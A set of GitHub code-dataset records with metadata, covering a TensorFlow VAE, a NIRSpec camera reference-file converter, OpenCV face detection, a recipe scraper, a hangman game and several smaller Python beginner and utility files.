SN1_1_ibin = self.spikebin_indv(SN1_1,0,phase1)\n # SN2_1_ibin = self.spikebin_indv(SN2_1,0,phase1)\n # SN1_1_tbin = self.spikebin_total(SN1_1t,0,phase1)\n # SN2_1_tbin = self.spikebin_total(SN2_1t,0,phase1)\n # SN_1_iCC = self.spike_cc(SN1_1_ibin,SN2_1_ibin)\n # SN_1_tCC = self.spike_tcc(SN1_1_tbin,SN2_1_tbin)\n\n # Coupled networks\n SN1_2_ibin = self.spikebin_indv(SN1_2, phase1, phase2)\n SN2_2_ibin = self.spikebin_indv(SN2_2, phase1, phase2)\n SN1_2_tbin = self.spikebin_total(SN1_1t, phase1, phase2)\n SN2_2_tbin = self.spikebin_total(SN2_1t, phase1, phase2)\n SN_2_iCC = self.spike_cc(SN1_2_ibin, SN2_2_ibin)\n SN_2_tCC = self.spike_tcc(SN1_2_tbin, SN2_2_tbin)\n\n # Second phase of uncoupled networks\n # SN1_3_ibin = self.spikebin_indv(SN1_3,phase2,phase3)\n # SN2_3_ibin = self.spikebin_indv(SN2_3,phase2,phase3)\n # SN1_3_tbin = self.spikebin_total(SN1_3t,phase2,phase3)\n # SN2_3_tbin = self.spikebin_total(SN2_3t,phase2,phase3)\n # SN_3_iCC = self.spike_cc(SN1_3_ibin,SN2_3_ibin)\n # SN_3_tCC = self.spike_tcc(SN1_3_tbin,SN2_3_tbin)\n\n return SN_2_tCC","repo_name":"KokilaP/Neural-Networks","sub_path":"lib/Spike_Stats.py","file_name":"Spike_Stats.py","file_ext":"py","file_size_in_byte":10541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33902280540","text":"# -*- coding: utf-8 -*-\n\n# 프롬프트와 사용자\n\n# 11장과 비슷하지만 y = input(\"이름?\") 처럼 이름? 을 물어보고 그답을 변수 y에 넣는 식으로 사용자에게 질문하고 답을 받을수있습니다.\nage = (input(\"몇 살이죠? \"))\nheight = (input(\"키는 얼마죠?\"))\nweight = (input(\"몸무게는 얼마죠? \"))\n\nprint(\"네, 나이는 %r 살, 키는 %r ,몸무게는%r이네요.\" %(age,height,weight))\nprint(\"뜸금없지만, 태양의 각지름은%r 정도입니다.\" % '''32'10''')\n\n# %r:은 디버그용이고 '코드를 쓴대로' 보여주는것 / %s:출력용\n","repo_name":"Ahnho/python","sub_path":"HW12.py","file_name":"HW12.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70965329672","text":"import tensorflow as tf\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow import keras\r\nimport numpy as np\r\n\r\nclass Sampling(tf.keras.layers.Layer):\r\n \"\"\"Uses (z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\r\n\r\n def call(self, inputs):\r\n z_mean, z_log_var = inputs\r\n batch = tf.shape(z_mean)[0]\r\n dim = tf.shape(z_mean)[1]\r\n epsilon = tf.random.normal(shape=(batch, dim))\r\n return z_mean + tf.exp(0.5 * z_log_var) * epsilon\r\n\r\n\r\nclass PositionEncoder(layers.Layer):\r\n def __init__(self, num_patches, projection_dim):\r\n super(PositionEncoder, self).__init__()\r\n self.num_patches = num_patches\r\n self.projection = layers.Dense(units=projection_dim)\r\n self.position_embedding = layers.Embedding(\r\n input_dim=num_patches, output_dim=projection_dim\r\n )\r\n\r\n def call(self, patch):\r\n positions = tf.range(start=0, limit=self.num_patches, delta=1)\r\n encoded = self.projection(patch) + self.position_embedding(positions)\r\n return encoded\r\n \r\ndef positional_encoding(num_patches, projection_dim):\r\n depth = projection_dim / 2\r\n\r\n positions = np.arange(num_patches)[:, np.newaxis] # (num_patches, 1)\r\n depths = np.arange(depth)[np.newaxis, :] / depth # (1, depth)\r\n\r\n angle_rates = 1 / (10000**depths) # (1, depth)\r\n angle_rads = positions * angle_rates # (num_patches, depth)\r\n\r\n pos_encoding = np.concatenate(\r\n [np.sin(angle_rads), np.cos(angle_rads)],\r\n axis=-1)\r\n\r\n return tf.cast(pos_encoding, dtype=tf.float32)\r\n\r\nclass AngularPositionEncoder(layers.Layer):\r\n def __init__(self, num_patches, projection_dim):\r\n super(AngularPositionEncoder, self).__init__()\r\n self.num_patches = num_patches\r\n self.projection = layers.Dense(units=projection_dim)\r\n\r\n def call(self, patch):\r\n pos_encoding = positional_encoding(self.num_patches, self.projection.units)\r\n encoded = self.projection(patch) + pos_encoding[tf.newaxis, ...]\r\n return encoded\r\n\r\n\r\ndef choose_model(encoder_type,\r\n decoder_type, \r\n latent_dim,\r\n time_step,\r\n feature_num,\r\n d_model,\r\n num_heads,\r\n num_transformer_blocks,\r\n activation='tanh',\r\n position_encoder=None,\r\n encoder_encoding=False,\r\n decoder_encoding=False):\r\n\r\n \"\"\"\r\n Construct an encoder-decoder model architecture for sequence-to-sequence tasks.\r\n\r\n Parameters:\r\n encoder_type (str): Type of encoder to use ('LSTM' or 'Transformer').\r\n decoder_type (str): Type of decoder to use ('LSTM' or 'Transformer').\r\n latent_dim (int): Dimensionality of the latent space.\r\n time_step (int): Number of time steps in input sequences.\r\n feature_num (int): Number of features at each time step.\r\n d_model (int): Dimensionality of the Transformer model.\r\n num_heads (int): Number of Transformer heads.\r\n num_transformer_blocks (int): Number of Transformer blocks to stack.\r\n activation (str): Activation function for the model layers (default is 'tanh').\r\n position_encoder (str, optional): Type of positional encoding ('angular', 'embedding', or None).\r\n encoder_encoding (bool, optional): Apply positional encoding to encoder input sequences (for Transformer encoder).\r\n decoder_encoding (bool, optional): Apply positional encoding to decoder input sequences (for Transformer decoder).\r\n \r\n Returns:\r\n encoder (tf.keras.Model): Constructed encoder model.\r\n decoder (tf.keras.Model): Constructed decoder model.\r\n \"\"\"\r\n\r\n if encoder_type == 'LSTM':\r\n encoder_inputs = keras.Input(shape=(time_step, feature_num))\r\n x = tf.keras.layers.LSTM(128, activation=activation, dropout=0.1, return_sequences=True)(encoder_inputs)\r\n x = tf.keras.layers.LSTM(64, activation=activation, dropout=0.1,return_sequences=False)(x)\r\n # x = layers.Dense(256, activation=activation)(x)\r\n z_mean = layers.Dense(latent_dim, name=\"z_mean\")(x)\r\n z_log_var = layers.Dense(latent_dim, name=\"z_log_var\")(x)\r\n z = Sampling()([z_mean, z_log_var])\r\n encoder = keras.Model(encoder_inputs, [z_mean, z_log_var, z], name=\"encoder\")\r\n encoder.summary()\r\n elif encoder_type == 'Transformer':\r\n encoder_inputs = keras.Input(shape=(time_step, feature_num))\r\n if position_encoder == 'angular' and encoder_encoding:\r\n x = AngularPositionEncoder(time_step, d_model)(encoder_inputs)\r\n elif position_encoder == 'embedding' and encoder_encoding:\r\n x = PositionEncoder(time_step, d_model)(encoder_inputs)\r\n else:\r\n x = tf.keras.layers.Dense(units=d_model)(encoder_inputs)\r\n\r\n for _ in range(num_transformer_blocks):\r\n x = tf.keras.layers.MultiHeadAttention(num_heads=num_heads, key_dim=d_model//num_heads)(x, x)\r\n x_h = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dropout(0.1)(x_h)\r\n# x = layers.Add()([x, x_h])\r\n x = x_h\r\n x = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dense(d_model * 2, activation=activation)(x)\r\n x_h = layers.Dense(d_model, activation=activation)(x_h)\r\n# x = layers.Add()([x, x_h])\r\n x = x_h\r\n\r\n x = tf.keras.layers.GlobalAveragePooling1D()(x)\r\n\r\n z_mean = layers.Dense(latent_dim, name=\"z_mean\")(x)\r\n z_log_var = layers.Dense(latent_dim, name=\"z_log_var\")(x)\r\n z = Sampling()([z_mean, z_log_var])\r\n encoder = keras.Model(encoder_inputs, [z_mean, z_log_var, z], name=\"encoder\")\r\n encoder.summary()\r\n \r\n if decoder_type == 'LSTM':\r\n \r\n latent_inputs = keras.Input(shape=(latent_dim,))\r\n x = layers.Dense(time_step * feature_num, activation=activation)(latent_inputs)\r\n x = layers.Reshape((time_step, feature_num))(x)\r\n x = tf.keras.layers.LSTM(32, activation=activation, return_sequences=True)(x)\r\n x = tf.keras.layers.LSTM(64, activation=activation, return_sequences=True)(x)\r\n decoder_outputs = tf.keras.layers.LSTM(feature_num, activation=activation, return_sequences=True)(x)\r\n# decoder_outputs = tf.keras.layers.Lambda(lambda x: x * threshold)(decoder_outputs)\r\n decoder = keras.Model(latent_inputs, decoder_outputs, name=\"decoder\")\r\n decoder.summary()\r\n\r\n elif decoder_type == 'Transformer':\r\n \r\n latent_inputs = keras.Input(shape=(latent_dim,))\r\n x = layers.Dense(time_step * feature_num, activation=activation)(latent_inputs)\r\n x = layers.Reshape((time_step, feature_num))(x) \r\n if position_encoder == 'angular' and decoder_encoding:\r\n x = AngularPositionEncoder(time_step, d_model)(x)\r\n elif position_encoder == 'embedding' and decoder_encoding:\r\n x = PositionEncoder(time_step, d_model)(x)\r\n else:\r\n x = tf.keras.layers.Dense(units=d_model)(x)\r\n\r\n for _ in range(num_transformer_blocks):\r\n x = tf.keras.layers.MultiHeadAttention(num_heads=num_heads, key_dim=d_model//num_heads)(x, x)\r\n x_h = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dropout(0.1)(x_h)\r\n# x = layers.Add()([x, x_h])\r\n x = x_h\r\n x = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dense(d_model * 2, activation=activation)(x)\r\n x_h = layers.Dense(d_model, activation=activation)(x_h)\r\n x = x_h\r\n# x = layers.Add()([x, x_h])\r\n\r\n decoder_output = layers.Dense(feature_num)(x)\r\n\r\n\r\n decoder = keras.Model(latent_inputs, decoder_output, name=\"decoder\")\r\n decoder.summary()\r\n \r\n return encoder, decoder\r\n\r\n\r\n\r\n\r\nclass VAE(tf.keras.Model):\r\n def __init__(self, encoder, decoder, loss_type, kl_weights, **kwargs):\r\n super().__init__(**kwargs)\r\n self.encoder = encoder\r\n self.decoder = decoder\r\n self.loss_type = loss_type\r\n self.kl_weights = kl_weights # (kl_weight, kl_weight_start, kl_decay_rate)\r\n\r\n self.total_loss_tracker = keras.metrics.Mean(name=\"total_loss\")\r\n self.reconstruction_loss_tracker = keras.metrics.Mean(\r\n name=\"reconstruction_loss\"\r\n )\r\n self.kl_loss_tracker = keras.metrics.Mean(name=\"kl_loss\")\r\n \r\n self.val_total_loss_tracker = keras.metrics.Mean(name=\"val_total_loss\")\r\n self.val_reconstruction_loss_tracker = keras.metrics.Mean(\r\n name=\"val_reconstruction_loss\"\r\n )\r\n self.val_kl_loss_tracker = keras.metrics.Mean(name=\"val_kl_loss\")\r\n\r\n\r\n @property\r\n def metrics(self):\r\n return [\r\n self.total_loss_tracker,\r\n self.reconstruction_loss_tracker,\r\n self.kl_loss_tracker,\r\n self.val_total_loss_tracker,\r\n self.val_reconstruction_loss_tracker,\r\n self.val_kl_loss_tracker,\r\n ]\r\n\r\n def train_step(self, data):\r\n if self.loss_type == 'mae':\r\n loss = keras.losses.mae\r\n elif self.loss_type == 'mse':\r\n loss = keras.losses.mse\r\n\r\n kl_weight = self.kl_weights[0]\r\n kl_weight_start = self.kl_weights[1]\r\n kl_decay_rate = self.kl_weights[2]\r\n\r\n \r\n step = tf.cast(self.optimizer.iterations, tf.float32)\r\n klw = kl_weight - (kl_weight - kl_weight_start) * kl_decay_rate ** step\r\n with tf.GradientTape() as tape:\r\n z_mean, z_log_var, z = self.encoder(data, training=True)\r\n reconstruction = self.decoder(z, training=True)\r\n reconstruction_loss = tf.reduce_mean(\r\n tf.reduce_sum(\r\n loss(data, reconstruction), axis=1\r\n )\r\n )\r\n kl_loss = -klw * (1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var))\r\n kl_loss = tf.reduce_mean(tf.reduce_sum(kl_loss, axis=1))\r\n total_loss = reconstruction_loss + kl_loss\r\n grads = tape.gradient(total_loss, self.trainable_weights)\r\n \r\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\r\n self.total_loss_tracker.update_state(total_loss)\r\n self.reconstruction_loss_tracker.update_state(reconstruction_loss)\r\n self.kl_loss_tracker.update_state(-0.5 * (1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var)))\r\n return {\r\n \"loss\": self.total_loss_tracker.result(),\r\n \"reconstruction_loss\": self.reconstruction_loss_tracker.result(),\r\n \"kl_loss\": self.kl_loss_tracker.result(),\r\n }\r\n \r\n \r\n def test_step(self, data):\r\n if self.loss_type == 'mae':\r\n loss = keras.losses.mae\r\n elif self.loss_type == 'mse':\r\n loss = keras.losses.mse\r\n \r\n z_mean, z_log_var, z = self.encoder(data, training=False)\r\n reconstruction = self.decoder(z, training=False)\r\n reconstruction_loss = tf.reduce_mean(\r\n tf.reduce_sum(\r\n loss(data, reconstruction), axis=1\r\n )\r\n )\r\n kl_loss = -0.5 * (1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var))\r\n kl_loss = tf.reduce_mean(tf.reduce_sum(kl_loss, axis=1))\r\n total_loss = reconstruction_loss + kl_loss\r\n self.val_total_loss_tracker.update_state(total_loss)\r\n self.val_reconstruction_loss_tracker.update_state(reconstruction_loss)\r\n self.val_kl_loss_tracker.update_state(kl_loss)\r\n return {\r\n \"loss\": self.val_total_loss_tracker.result(),\r\n \"reconstruction_loss\": self.val_reconstruction_loss_tracker.result(),\r\n \"kl_loss\": self.val_kl_loss_tracker.result(),\r\n }\r\n ","repo_name":"yasaminborhani/Clustering_Trajectories_VAE","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30600122429","text":"import datetime\nfrom .utils import pcf2model\nfrom jwst.datamodels import CameraModel\nfrom asdf.tags.core import Software, HistoryEntry\n\n__all__ = [\"create_camera_reference\", \"camera2asdf\"]\n\ndef camera2asdf(camera_refname, author, description, useafter):\n try:\n model = pcf2model(camera_refname, name='camera')\n except:\n print(\"Camera file was not converted.\")\n raise\n camera_model = CameraModel(model=model)\n camera_model.meta.author = author\n camera_model.meta.description = description\n camera_model.meta.pedigree = \"GROUND\"\n camera_model.meta.title = \"NIRSPEC CAMERA file\"\n camera_model.meta.useafter = useafter\n entry = HistoryEntry({'description': \"New version created from CV3 with updated file structure\", 'time': datetime.datetime.utcnow()})\n software = Software({'name': 'jwstreftools', 'author': 'N.Dencheva',\n 'homepage': 'https://github.com/spacetelescope/jwreftools', 'version': \"0.7.1\"})\n entry['software'] = software\n camera_model.history.append(entry)\n\n return camera_model\n\ndef create_camera_reference(camera_refname, out_name, author=None, description=None, useafter=None):\n with open(camera_refname) as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n for i, line in enumerate(lines):\n if 'AUTHOR' in line:\n auth = lines[i + 1]\n continue\n elif 'DESCRIPTION' in line:\n descrip = lines[i + 1]\n continue\n elif 'DATE' in line:\n date = lines[i + 1]\n continue\n\n if author is None:\n author = auth\n if description is None:\n description = descrip\n if useafter is None:\n useafter = date\n\n try:\n model = camera2asdf(camera_refname, author, description, useafter)\n except:\n raise\n model.to_asdf(out_name)\n new_model = CameraModel(out_name)\n new_model.validate()\n\n#if __name__ == '__main__':\n #import argpars\n #parser = argpars.ArgumentParser(description=\"Creates NIRSpec 'camera' reference file in ASDF format.\")\n #parser.add_argument(\"camera_file\", type=str, help=\"Camera file.\")\n #parser.add_argument(\"output_name\", type=str, help=\"Output file name\")\n #res = parser.parse_args()\n #if res.output_name is None:\n #output_name = \"nirspec_camera.asdf\"\n #else:\n #output_name = res.output_name\n\n #ref_kw = common_reference_file_keywords(\"CAMERA\", \"NIRSPEC Camera Model - CDP4\")\n\n #camera2asdf(camera_file, output_name, ref_kw)\n","repo_name":"spacetelescope/jwreftools","sub_path":"jwreftools/nirspec/camera2asdf.py","file_name":"camera2asdf.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"7632725080","text":"import cv2\nfacecascade=cv2.CascadeClassifier('D:\\\\faceRecognition-master\\\\haarcascade_frontalface.xml')\nvideocapt=cv2.VideoCapture(0)\nwhile True:\n retval,frame=videocapt.read()\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n faces=facecascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=5,minSize=(35,35))\n for x,y,w,h in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(50,200,50),2)\n cv2.imshow('Video',frame)\n if cv2.waitKey(1) & 0xFF==ord('q'):\n sys.exit()\n","repo_name":"NIKHILDUGAR/FaceDetectionOpenCV","sub_path":"main file.py","file_name":"main file.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"37122100064","text":"import re\nfrom typing import *\n\n\nclass Filter:\n def __init__(self, **kwargs):\n # any argument matching the pattern is accepted\n for attribute in kwargs:\n if not (re.match(r'\\w+__\\w+__$', attribute) or attribute == \"operator\"):\n raise ValueError(f\"{attribute} does not match expected attribute format.\")\n self.__dict__.update(kwargs)\n if \"operator\" not in self.__dir__():\n self.operator = \"AND\"\n\n def __eq__(self, other):\n # -> tested\n # check for all non hidden attributes of this class\n # if they are present in another object\n # and match the corresponding attributes of another object\n attributes = [attr for attr in self.__dir__() if not (attr.startswith(\"__\") or attr == \"operator\")]\n checks = []\n try:\n for attr in attributes:\n attribute = \"__\".join(attr.split(\"__\")[0:-2])\n magic_method = \"__\" + attr.split(\"__\")[-2] + \"__\"\n value = self.__getattribute__(attr)\n other_value = other.__getattribute__(attribute)\n checks.append(value.__getattribute__(magic_method)(other_value))\n except AttributeError:\n # when attribute is not present in other object, abort\n return False\n # return true if\n # all attributes of this filter are present in the other object\n # and the values match the magic method\n return False not in checks\n\n def __str__(self, logical_condition: Optional[str] = None):\n # -> tested\n # Returns a string to be used for sql style databases\n attributes = [a for a in self.__dir__() if not (a.startswith(\"__\") or a == \"operator\")]\n for attr in range(len(attributes)):\n a = attributes[attr] + str(self.__getattribute__(attributes[attr]))\n a = a.replace(\"__eq__\", \"=\")\n a = a.replace(\"__ne__\", \"!=\")\n a = a.replace(\"__lt__\", \"<\")\n a = a.replace(\"__gt__\", \">\")\n a = a.replace(\"__lte__\", \"<=\")\n a = a.replace(\"__gte__\", \">=\")\n a = a.replace(\"__contains__\", \" BETWEEN \")\n attributes[attr] = a\n return str.join(f\" {(logical_condition or self.operator).upper()} \", attributes)\n\n def __bool__(self):\n return bool(len([a for a in self.__dir__() if not (a.startswith(\"__\") or a == \"operator\")]))\n\n\nif __name__ == \"__main__\":\n import tests\n tests.run_tests()\n","repo_name":"MakerStuff/Vertretungsplangak_Bot","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"30272733376","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('faq', '0004_auto_20141126_1328'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='faqentry',\n name='position',\n field=models.PositiveSmallIntegerField(),\n preserve_default=True,\n ),\n ]\n","repo_name":"mgaebler/product_test","sub_path":"django_app/faq/migrations/0005_auto_20141205_1142.py","file_name":"0005_auto_20141205_1142.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10577825665","text":"from bs4 import BeautifulSoup\nimport requests\nfrom re import sub\nimport re\nimport json\nimport pdb\n\ndirectory = \"recipes/\"\n\n# \"dovlecei\": [{\"unit\":\"lingura\", \"qty\":\"3\"},\n# {\"unit\":\"kg\",\"qty\":5\"}]\n\nrecipe = {} # it's not an actual recipe, more like a list of shopping cart\n\n\ndef custom_merge(dictionary, subdictionary, ingredient_name):\n if ingredient_name in dictionary:\n for i in range(len(dictionary[ingredient_name])):\n if dictionary[ingredient_name][i]['unit'] == subdictionary['unit']:\n try:\n dictionary[ingredient_name][i]['amount'] = float(dictionary[ingredient_name][i]['amount']) + float(\n subdictionary['amount'])\n except ValueError as error:\n print(error)\n break\n if i == len(dictionary[ingredient_name]) - 1 and dictionary[ingredient_name][i]['unit'] != subdictionary[\n 'unit']:\n dictionary[ingredient_name].append(subdictionary)\n dictionary[ingredient_name][-1]['amount'] = float(dictionary[ingredient_name][-1]['amount'])\n\n\n else:\n\n dictionary[ingredient_name] = [subdictionary]\n dictionary[ingredient_name][-1]['amount'] = float(dictionary[ingredient_name][-1]['amount'])\n\n\ndef scrapeRecipe(link):\n page = requests.get(link)\n soup = BeautifulSoup(page.text, 'html.parser')\n\n # titlul retetei\n title = soup.select('.tdb-title-text')[0].text.strip().replace(\"/\", \"\").split(\"–\")[0]\n print(\"recipe name :\", title)\n\n # grupele de ingrediente -> ex. vezi reteta cu dovlecei, are 2 : pt dovlecei in aluat/crusta de pesmet\n ingredient_groups = soup.select('.wprm-recipe-ingredient-group')\n\n for j in ingredient_groups:\n group_ingredients_unparsed = j.select('.wprm-recipe-ingredients > .wprm-recipe-ingredient')\n for i in group_ingredients_unparsed:\n ingredient_amount = i.select('.wprm-recipe-ingredient-amount')\n ingredient_amount_parsed = ''\n if ingredient_amount:\n ingredient_amount_parsed = i.select('.wprm-recipe-ingredient-amount')[0].text.strip()\n\n ingredient_unit = i.select('.wprm-recipe-ingredient-unit')\n ingredient_unit_parsed = ''\n if ingredient_unit:\n ingredient_unit_parsed = i.select('.wprm-recipe-ingredient-unit')[0].text.strip()\n\n ingredient_name = i.select('.wprm-recipe-ingredient-name')\n ingredient_name_parsed = ''\n if ingredient_name:\n ingredient_name_parsed = i.select('.wprm-recipe-ingredient-name')[0].text.strip()\n\n # construim ingredientul\n\n # verificam daca avem 3-4 in amount\n try:\n ingredient_amount_parsed = ingredient_amount_parsed.split('-')[-1]\n except ValueError:\n print(ValueError)\n\n if ingredient_amount_parsed == 'putina' or ingredient_amount_parsed == 'putin':\n ingredient_amount_parsed = 1\n ingredient = {'amount': ingredient_amount_parsed if ingredient_amount_parsed else 1,\n 'unit': ingredient_unit_parsed if ingredient_unit_parsed else 'bucata'}\n\n custom_merge(recipe, ingredient, ingredient_name_parsed)\n\n\ndef writeInJson(shopping_cart):\n json_string = json.dumps(shopping_cart, indent=4)\n with open(f\"recipes/ShoppingCart\", \"w\") as out_file:\n out_file.write(json_string)\n\n\ndef main():\n links = ['https://jamilacuisine.ro/dovlecei-pane-in-crusta-de-pesmet-si-in-aluat/',\n 'https://jamilacuisine.ro/budinca-de-dovlecei-cu-bacon-reteta-video/',\n 'https://jamilacuisine.ro/dovlecei-cu-sos-de-smantana-reteta-video/']\n for link in links:\n scrapeRecipe(link)\n\n writeInJson(recipe)\n\n\nmain()\n\n","repo_name":"crisubianca/PY-Project-2022","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34518110305","text":"import random\r\nHANGMAN = (\r\n\"\"\"\r\n ------\r\n | |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n | |\r\n | O\r\n |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n | |\r\n | O\r\n | -+-\r\n | \r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n | |\r\n | O\r\n | /-+-\r\n | \r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n | |\r\n | O\r\n | /-+-/\r\n | \r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n | |\r\n | O\r\n | /-+-/\r\n | |\r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n | |\r\n | O\r\n | /-+-/\r\n | |\r\n | |\r\n | | \r\n | | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n | |\r\n | O\r\n | /-+-/\r\n | |\r\n | |\r\n | | |\r\n | | |\r\n | \r\n----------\r\n\"\"\")\r\n\r\nword = \"dog lion pig deer tiger shark dinosaur python titan\".split()\r\n\r\ndef getRandomWord(wordList):\r\n # function that displays a random string from a string passed in\r\n wordIndex = random.randint(0, len(wordList)-1)\r\n return word[wordIndex]\r\ndef displayBoard(HANGMAN, missedLetters, correctLetters, secretWord):\r\n print (HANGMAN[len(missedLetters)])\r\n\r\n print(\"missed letters : , end = \" \"\")\r\n for letter in missedLetters:\r\n print (\"letter, end = \" \"\")\r\n blanks = \"_\" * len(secretWord)\r\n\r\n for i in range (len(secretWord)):#replaces blanks with correctly guessed letters\r\n if secretWord[i] in correctLetters:\r\n blanks = blanks[:i] + secretWord[i] + blanks[i+1:]\r\n for letter in blanks: # show the secret word with spaces between each letter\r\n print(letter, end = \" \")\r\ndef getGuess(alreadyGuessed):\r\n #returns the players letters entered, this function makes sure that the player enters a single letter\r\n while True:\r\n guess = input(\"Guess a Letter\")\r\n guess = guess.lower()\r\n if len(guess) != 1:\r\n print(\"Please Enter a single letter\")\r\n elif guess is alreadyGuessed:\r\n print(\"You have already guessed that letter, Choose again\")\r\n elif guess not in 'abcdefghijklmnopqrstuvwxyz':\r\n print(\"Please enter a letter\")\r\n else:\r\n return guess\r\n\r\ndef playAgain():\r\n playAgain = input(\"Do you want to play again (Yes or No)\")\r\n return playAgain.lower().startwith(\"y\")\r\n\r\nprint(\" H A N G M A N \")\r\nmissedLetters = \"\"\r\ncorrectLetters = \"\"\r\nsecretWord = getRandomWord(word)\r\ngameisDone = False\r\n\r\nwhile True:\r\n displayBoard(HANGMAN, missedLetters, correctLetters, secretWord)\r\n\r\n guess = getGuess(missedLetters + correctLetters)\r\n\r\n if guess in secretWord:\r\n correctLetters = correctLetters + guess\r\n\r\n foundAllLetters = True\r\n for i in range(len(secretWord)):\r\n if secretWord[i] not in correctLetters:\r\n foundAllLetters = False\r\n break\r\n if foundAllLetters:\r\n print(\"You Have WON the game, the secret word is \" + secretWord)\r\n else:\r\n missedLetters = missedLetters + guess\r\n\r\n if len(missedLetters) == len(HANGMAN)-1:\r\n displayBoard(HANGMAN, missedLetters, correctLetters, secretWord)\r\n print(\"You hav run out of guesses!!!\" + str(len(missedLetters)) + \" missed guesses and \" + str(len(correctLetters)) + \" correct guesses, and the word is\" + secretWord + \"\\\"\")\r\n gameisDone = True\r\n\r\n\r\n\r\nif gameisDone:\r\n if playAgain():\r\n missedLetters = \"\"\r\n correctLetter = \"\"\r\n gameisDone = False\r\n secretWord = getRandomWord(words)\r\n else:\r\n print(\"Game Has Ended\")\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"LorcanHbermingham88/python_hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72326324553","text":"import asyncio\nfrom typing import Optional\nfrom cdm.enums import CdmStatusLevel, CdmDataFormat\nfrom cdm.objectmodel import (\n CdmCorpusDefinition,\n CdmObject,\n)\n\n\nfrom pyspark_cdm.exceptions import DocumentLoadingException\n\n\ndef get_or_create_eventloop() -> asyncio.AbstractEventLoop:\n \"\"\"\n Get or create an event loop, this is to make it work in a multi-threaded environment.\n \"\"\"\n try:\n return asyncio.get_event_loop()\n except RuntimeError as ex:\n if \"There is no current event loop in thread\" in str(ex):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n return asyncio.get_event_loop()\n\n\ndef event_callback(\n status_level: CdmStatusLevel,\n message: str,\n) -> None:\n \"\"\"\n Event callback function for CDM.\n\n Args:\n status_level (CdmStatusLevel): Status level of the message.\n message (str): Message to be printed.\n \"\"\"\n print(message)\n\n\ndef get_document_from_path(\n corpus: CdmCorpusDefinition,\n path: str,\n) -> Optional[CdmObject]:\n \"\"\"\n Get the content of a document from the CDM corpus.\n\n Args:\n corpus (CdmCorpusDefinition): CDM corpus.\n path (str): Path to the document.\n\n Returns:\n Optional[CdmObject]: Content of the document, can be any CDM object.\n \"\"\"\n loop = get_or_create_eventloop()\n task = loop.create_task(corpus.fetch_object_async(path))\n manifest = loop.run_until_complete(task)\n\n if manifest is None:\n raise DocumentLoadingException(f\"Unable to load document from path: {path}\")\n\n return manifest\n\n\ndef remove_root_from_path(path: str, root: str) -> str:\n \"\"\"\n Remove the root from the path.\n\n Args:\n path (str): Path to remove the root from.\n root (str): Root to remove from the path.\n\n Returns:\n str: Path without the root.\n \"\"\"\n return f\"/{path.lstrip(root)}\"\n","repo_name":"quantile-development/pyspark-cdm","sub_path":"pyspark_cdm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20423949271","text":"\n# Function\n# 수학 > x라는 값이 들어갔을 대 결과값 y를 내뱉는 것.\n# 파이썬 > x라는 값이 들어갔을 대 (결과값 y)를 